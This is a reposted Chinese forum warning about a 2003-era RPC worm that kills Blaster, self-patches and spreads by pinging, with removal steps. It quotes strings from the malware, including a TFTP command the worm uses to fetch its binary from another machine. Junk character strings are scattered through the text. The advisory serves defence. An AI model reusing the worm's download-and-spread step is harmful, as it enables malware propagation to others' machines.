[转帖]最新RPC漏洞病毒.关于最近的疯狂ping

自由居居士

该病毒的特点是将“冲击波”(Worm.Blaster)病

9 ?0 N$ h' d2 G! d0 k  Z' u1 E0 ]毒干掉，并在系统内值入，预防冲击波病毒的疫苗。
( H8 V6 @" A' K; p7 t9 v/ |, n2 g
- P1 K& A- ?1 _8 Z. {3 @0 u( _5 Z然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然

后该病毒会开启数百个的线程PING其它IP地址，并通过RPC漏洞快速传播自己，
+ M% Q2 f8 Z3 ~/ u! y  I# h- z
消耗大量CPU和网络资源，并且有可能会导致系统死机。该病毒的作者似乎无意
. P( t# |1 R4 d+ N
$ n4 m4 u' @' O+ e作恶，病毒设定在2004年自行毁灭。
" z3 J0 B, l" i) X- C# d
: Z) Y3 \" |& [5 y( E4 \由于该病毒采用PING方式进行探测，只感染能够PING通的机器，因此广大用户，

2 h0 h6 k7 v  ~* x9 W0 L9 d设置防火墙的规则，禁止ping，这样可以有效防止该病毒的入侵。


. [, H) H$ D2 X% J& B如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙，，这是中国人自己编译的病毒
% {% ?. w% e& {; q
9 r! D. N# I/ ^8 lSVCHOST.EXE 大小是19.2K
8 c: y2 k7 P- @( j. W' f5 q3 zDLLHOST.EXE 大小是10.K

7 d3 O9 ~  H% r, M2 q' MDLLHOST.EXE里面有这样的话!
; M+ v! i3 G1 }( e9 j

引用:
8 f! G& E) }9 b% @" k7 c3 u! W
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
  X4 o" A1 H( `$ R/ U+ t6 `/ N
这2个文件在在：％Windir％\system32\wins\目录里..（注意:不是：％Windir％\system32\..）


( q* q, o; d- e8 p紧急解决方案：
停止一下两个服务：

Network connections Sharing
0 z& A8 N! M7 t7 ?0 y! J7 i- UWINS Client
8 g5 {9 r3 R) u  h  S
在：％Windir％\system32\wins\
  S* y' A6 [2 _  E* [1 X/ ]目录下删除：
" k* i- j' f8 f% }9 d) {+ w2 U
SVCHOST.EXE
1 x  A8 v- {8 f5 A8 ?DLLHOST.EXE
; X! e. \( _, p- ]' p8 C
这两个文件，安装防火墙，并禁止PING。

自由居居士

看来还是取消网络共乡有效啊~~